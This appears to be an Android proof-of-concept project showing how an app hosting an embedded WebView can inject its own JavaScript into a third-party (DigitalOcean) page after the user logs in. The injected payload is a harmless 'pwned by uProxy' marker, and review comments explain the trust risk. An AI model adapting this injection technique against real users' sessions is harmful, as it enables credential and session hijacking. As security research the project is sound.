uProxy WebView Hijack Proof of Concept
<?xml version="1.0" encoding="utf-8"?>
<!--
  Single-screen layout: a hint label stacked above the embedded WebView.
  MainActivity rewrites the label text from the URL the WebView reports, so the
  label is app-controlled text shown next to third-party web content.
-->
<LinearLayout
    xmlns:tools="http://schemas.android.com/tools"
    xmlns:android="http://schemas.android.com/apk/res/android"
    android:orientation="vertical"
    android:layout_height="match_parent"
    android:layout_width="match_parent">

    <!-- Contextual hint; the text below is only the initial placeholder. -->
    <TextView
        android:id="@+id/txt"
        android:layout_height="wrap_content"
        android:layout_width="wrap_content"
        android:text="This hint is set based on the webview's current URL." />

    <!-- Hosts the remote page; its settings and client are configured in MainActivity. -->
    <WebView
        android:id="@+id/wv"
        android:layout_height="wrap_content"
        android:layout_width="wrap_content" />

</LinearLayout>
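<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="org.uproxy.webviewhijack">

    <!--
      allowBackup is switched off. The embedded WebView signs the user in to a
      third-party site, and its cookies and cached data live in this app's
      private storage; with backups enabled that state can be copied off the
      device along with the rest of the app data.
    -->
    <application
        android:allowBackup="false"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">

        <!-- Launcher entry point; the only component this manifest declares. -->
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>

    <!-- The only permission requested: network access for the WebView. -->
    <uses-permission android:name="android.permission.INTERNET" />
</manifest>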
// Script the host app injects into the page (presumably the js/hijack.js asset
// that uProxyWebViewClient reads - confirm against the project layout).
// It is a visible marker only: it removes the page's root element and writes a
// fixed string, showing that code supplied by the embedding app ran inside the
// page the WebView had loaded.
document.documentElement.remove();
document.write('pwned by uProxy');
package org.uproxy.webviewhijack; | |
import android.os.Bundle; | |
import android.support.v7.app.AppCompatActivity; | |
import android.util.Log; | |
import android.webkit.WebSettings; | |
import android.webkit.WebView; | |
import android.widget.TextView; | |
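/**
 * Proof-of-concept activity: shows a third-party login page in an embedded WebView and, once
 * the WebView reports the post-login URL, has the app inject its own script into that page.
 *
 * <p>Review note: the app that owns a WebView decides which client, settings and scripts apply
 * to every page rendered in it, and the page cannot opt out. Credentials typed into an embedded
 * login page are therefore only as trustworthy as the embedding app; flows that hand the login
 * to the system browser or a Custom Tab avoid giving the app this position.
 */
public class MainActivity extends AppCompatActivity {

  private static final String TAG = "MainActivity";
  private static final String LOGIN_URL = "https://cloud.digitalocean.com/login";
  private static final String POST_LOGIN_URL = "https://cloud.digitalocean.com/droplets";

  private uProxyWebViewClient wvc;

  /**
   * Wires the WebView to {@link uProxyWebViewClient}, enables JavaScript, starts loading the
   * login page and sets the initial hint text.
   *
   * @param savedInstanceState state bundle passed through to the superclass
   */
  @Override
  protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);

    wvc = new uProxyWebViewClient(this);
    WebView wv = (WebView) findViewById(R.id.wv);
    wv.setWebViewClient(wvc);

    WebSettings ws = wv.getSettings();
    // The remote page needs script, and injectJS() relies on script execution as well.
    ws.setJavaScriptEnabled(true);
    // setAllowUniversalAccessFromFileURLs(true) used to be set here. Nothing in this activity
    // loads a file:// page (the injected script is passed to the WebView as a string), so the
    // setting only widened what a file:// document could reach; it is left at its default.

    wv.loadUrl(LOGIN_URL);
    // Set the hint right away instead of waiting for the first page-finished callback.
    // getUrl() can return null this early; onPageFinished() tolerates that.
    onPageFinished(wv, wv.getUrl());
  }

  /**
   * Updates the hint label for the URL the WebView reports and triggers script injection when
   * that URL is exactly the post-login page. Called from {@link #onCreate} and forwarded from
   * {@link uProxyWebViewClient#onPageFinished}.
   *
   * @param wv the WebView that reported the URL
   * @param url the reported URL; may be null
   */
  public void onPageFinished(WebView wv, String url) {
    TextView tv = (TextView) findViewById(R.id.txt);
    // String.valueOf keeps a null URL from reaching Log.i as a null message.
    // NOTE(review): full URLs of a signed-in session end up in logcat here; a production app
    // should not log them, since query strings can carry tokens.
    Log.i(TAG, String.valueOf(url));

    // Constant-first equals() so a null URL falls through to the last branch instead of throwing.
    if (LOGIN_URL.equals(url)) {
      tv.setText("Log into DigitalOcean below.");
    } else if (POST_LOGIN_URL.equals(url)) {
      tv.setText("You logged in successfully! Injecting custom script into the page.");
      wvc.injectJS(wv);
    } else {
      tv.setText("The webview loaded an unrecognized URL, no contextual help available: " + url);
    }
  }
}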
package org.uproxy.webviewhijack; | |
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
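/**
 * WebViewClient for the proof of concept: loads a script from the app's assets once, forwards
 * page-finished events to {@link MainActivity}, and evaluates the script in the WebView on
 * request.
 *
 * <p>Review note: the script is evaluated in whatever page the WebView is showing at that
 * moment, so it runs with that page's origin and session. The page has no way to detect or
 * prevent this; the only control is which app the user trusts to host the WebView.
 */
public class uProxyWebViewClient extends WebViewClient {

  private static final String SCRIPT_ASSET = "js/hijack.js";

  private final MainActivity parent;
  private final String injectedScript;

  /**
   * Reads the script asset into memory.
   *
   * @param main activity that owns the WebView; also used to reach the asset manager
   * @throws RuntimeException if the asset cannot be read
   */
  public uProxyWebViewClient(MainActivity main) {
    super();
    parent = main;
    injectedScript = readScript(main);
  }

  /** Reads the whole script asset as UTF-8 text. */
  private static String readScript(MainActivity main) {
    try (InputStream input = main.getAssets().open(SCRIPT_ASSET);
        ByteArrayOutputStream collected = new ByteArrayOutputStream()) {
      // Read until end of stream: available() is only an estimate and a single read() call
      // may return fewer bytes than requested, which would truncate the script.
      byte[] chunk = new byte[4096];
      int count;
      while ((count = input.read(chunk)) != -1) {
        collected.write(chunk, 0, count);
      }
      return new String(collected.toByteArray(), StandardCharsets.UTF_8);
    } catch (IOException e) {
      // Keep the cause so the failure can be diagnosed from the thrown exception itself.
      throw new RuntimeException("Could not read js/hijack.js", e);
    }
  }

  /**
   * Lets the WebView handle every navigation itself.
   *
   * <p>Returning false unconditionally means no host or scheme allow-list is applied to links
   * and redirects followed inside the WebView.
   */
  @Override
  public boolean shouldOverrideUrlLoading(WebView webview, String url) {
    return false;
  }

  /** Forwards the event to the activity, which decides whether to inject. */
  @Override
  public void onPageFinished(WebView wv, String url) {
    super.onPageFinished(wv, url);
    parent.onPageFinished(wv, url);
  }

  /**
   * Evaluates the loaded script in the page currently shown by {@code wv}.
   *
   * @param wv WebView to run the script in; the null callback discards the script's result
   */
  public void injectJS(WebView wv) {
    wv.evaluateJavascript(injectedScript, null);
  }
}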